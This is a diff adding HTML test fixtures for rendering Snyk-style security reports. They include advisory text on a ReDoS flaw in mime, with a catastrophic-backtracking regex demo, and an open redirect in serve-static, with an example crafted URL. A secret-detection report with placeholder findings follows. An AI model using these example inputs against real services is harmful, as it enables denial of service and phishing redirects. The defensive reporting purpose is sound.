+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> mime@1.2.11</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; accepts@1.0.0 &#x203A; mime@1.2.11</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 3 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; send@0.2.0 &#x203A; mime@1.2.11</div>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; type-is@1.0.0 &#x203A; mime@1.2.11</div>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4 &#x203A; mime@1.2.11</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/mime" target="_blank" rel="noopener noreferrer">mime</a> is a comprehensive, compact MIME type module.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses regex the following regex <code>/.*[\.\/\\]/</code> in its lookup, which can cause a slowdown of 2 seconds for 50k characters.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>mime</code> to version 1.4.1, 2.0.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/broofa/node-mime/commit/1df903fdeb9ae7eaa048795b8d580ce2c98f40b0" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/broofa/node-mime/commit/855d0c4b8b22e4a80b9401a81f2872058eae274d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/broofa/node-mime/issues/167" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li><li><a href="https://www.npmjs.com/advisories/535" target="_blank" rel="noopener noreferrer">NPM Security Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:mime:20170907" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">24</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:serve-static:20150113</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> serve-static@1.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1</div>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p>When using serve-static middleware version &lt; 1.7.2 and it&#39;s configured to mount at the root, it creates an open redirect on the site.</p><p>_Source: <a href="https://nodesecurity.io/advisories/35" target="_blank" rel="noopener noreferrer">Node Security Project</a>_</p><h2>Details</h2><p>For example:</p><p>If a user visits <code>http://example.com//www.google.com/%2e%2e</code> they will be redirected to <code>//www.google.com/%2e%2e</code>, which some browsers interpret as <code>http://www.google.com/%2e%2e</code>.</p><h2>Remediation</h2><ul><li>Update to version 1.7.2 or greater (or 1.6.5 if sticking to the 1.6.x line).</li><li>Disable redirects if not using the feature with &#39;redirect: false&#39; option and cannot upgrade.</li></ul><h2>References</h2><ul><li>https://github.com/expressjs/serve-static/issues/26</li><li>https://www.owasp.org/index.php/Open_redirect</li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:serve-static:20150113" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/internal/presenters/testdata/ufm/secrets.duplicated-sarif-rules.html
+++ b/internal/presenters/testdata/ufm/secrets.duplicated-sarif-rules.html
@@ -1,0 +1,282 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="5 open issues.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">April 15, 2026 13:09 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Secret Detection</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 5</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">5 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Secrets Issues (5)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">00000000-0000-0000-0000-000000000000</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>generic/file with spaces, line 2</strong></div>
+      <div class="file-location">Found in: <strong>generic/file with spaces, line 3</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">00000000-0000-0000-0000-000000000001</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>generic/secret, line 2</strong></div>
+      <div class="file-location">Found in: <strong>generic/secret, line 3</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">00000000-0000-0000-0000-000000000002</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>generic/config.json, line 2</strong></div>
+      <div class="file-location">Found in: <strong>generic/config.json, line 3</strong></div>
+      <div class="file-location">Found in: <strong>generic/config.json, line 4</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">00000000-0000-0000-0000-000000000003</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>generic/file with spaces, line 1</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">00000000-0000-0000-0000-000000000004</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>generic/secret, line 1</strong></div>
+    </div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/internal/presenters/testdata/ufm/secrets.html
+++ b/internal/presenters/testdata/ufm/secrets.html
@@ -1,0 +1,261 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="2 open issues, 1 ignored.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
